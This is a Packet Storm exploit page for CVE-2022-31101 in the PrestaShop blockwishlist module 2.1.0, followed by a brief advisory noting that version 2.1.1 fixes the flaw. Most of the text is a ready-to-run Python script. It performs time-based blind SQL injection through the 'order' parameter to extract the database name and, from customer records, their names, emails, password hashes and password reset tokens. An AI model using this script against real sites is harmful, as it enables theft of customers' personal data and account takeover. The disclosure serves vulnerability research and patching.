

Prestashop Blockwishlist 2.1.0 SQL Injection

Prestashop Blockwishlist module version 2.1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi# Date: 29/07/22# Exploit Author: Karthik UJ (@5up3r541y4n)# Vendor Homepage: Software Link (blockwishlist): Software Link (prestashop): Version (blockwishlist): 2.1.0# Version (prestashop): Tested on: Linux# CVE: CVE-2022-31101# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShopimport requestsurl = input("Enter the url of wishlist's endpoint ( ") # Example: = input("Enter cookie value:\n")header = {    "Cookie": cookie}# Define static stuffparam = "&order="staticStart = ", (select case when ("staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'charset = list(charset)emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'emailCharset = list(emailCharset)# Query current database name lengthprint("\nFinding db name's length:")for length in range(1, 65):    condition = "LENGTH(database())=" + str(length)    fullUrl = url + param + staticStart + condition + staticEnd    try:        req = requests.get(fullUrl, headers=header, timeout=8)    except requests.exceptions.Timeout:        dbLength=length        print("Length: ", length, end='')        print("\n")        breakprint("Enumerating current database name:")databaseName = ''for i in range(1, dbLength+1):    for char in charset:        condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"        fullUrl = url + param + staticStart + condition + staticEnd        try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            print(char, end='')            databaseName += char            breakprint()# Enumerate any tableprefix = "ps_"tableName = prefix + "customer"staticStart = ", (select case when ("staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="staticEnd2 = "); -- .asc"print("\nEnumerating " + tableName + " table")for id in range(1, 10):    condition = "id_customer=" + str(id)    fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2    try:        req = requests.get(fullUrl, headers=header, timeout=8)        print("\nOnly " + str(id - 1) + " records found. Exiting...")        break    except requests.exceptions.Timeout:        pass    print("\nid = " + str(id))    # Finding firstname length    for length in range(0, 100):        condition = "LENGTH(firstname)=" + str(length)        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2                try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            firstnameLength=length            print("Firstname length: ", length, end='')            print()            break                # Enumerate firstname    firstname = ''    print("Firstname: ", end='')    for i in range(1, length+1):        for char in charset:            condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2            try:                req = requests.get(fullUrl, headers=header, timeout=8)            except requests.exceptions.Timeout:                print(char, end='')                firstname += char                break    print()    # Finding lastname length    for length in range(1, 100):        condition = "LENGTH(lastname)=" + str(length)        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2                try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            lastnameLength=length            print("Lastname length: ", length, end='')            print()            break        # Enumerate lastname    lastname = ''    print("Lastname: ", end='')    for i in range(1, length+1):        for char in charset:            condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2            try:                req = requests.get(fullUrl, headers=header, timeout=8)            except requests.exceptions.Timeout:                print(char, end='')                firstname += char                break    print()    # Finding email length    for length in range(1, 320):        condition = "LENGTH(email)=" + str(length)        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2                try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            emailLength=length            print("Email length: ", length, end='')            print()            break        # Enumerate email    email = ''    print("Email: ", end='')    for i in range(1, length+1):        for char in emailCharset:            condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2            try:                req = requests.get(fullUrl, headers=header, timeout=8)                if req.status_code == 500 and char == '.':                    print(char, end='')                    email += char            except requests.exceptions.Timeout:                print(char, end='')                email += char                break    print()    # Finding password hash length    for length in range(1, 500):        condition = "LENGTH(passwd)=" + str(length)        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2                try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            passwordHashLength=length            print("Password hash length: ", length, end='')            print()            break        # Enumerate password hash    passwordHash = ''    print("Password hash: ", end='')    for i in range(1, length+1):        for char in emailCharset:            condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2            try:                req = requests.get(fullUrl, headers=header, timeout=8)                if req.status_code == 500 and char == '.':                    print(char, end='')                    passwordHash += char            except requests.exceptions.Timeout:                print(char, end='')                passwordHash += char                break    print()    # Finding password reset token length    for length in range(0, 500):        condition = "LENGTH(reset_password_token)=" + str(length)        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2                try:            req = requests.get(fullUrl, headers=header, timeout=8)        except requests.exceptions.Timeout:            passwordResetTokenLength=length            print("Password reset token length: ", length, end='')            print()            break        # Enumerate password reset token    passwordResetToken = ''    print("Password reset token: ", end='')    for i in range(1, length+1):        for char in emailCharset:            condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2            try:                req = requests.get(fullUrl, headers=header, timeout=8)                if req.status_code == 500 and char == '.':                    print(char, end='')                    passwordResetToken += char            except requests.exceptions.Timeout:                print(char, end='')                passwordResetToken += char                break    print()

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prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.

GHSA-2jx3-5j9v-prpp: SQL Injection in BlockWishList

### Impact An authenticated customer can perform SQL injection ### Patches Issue is fixed in 2.1.1

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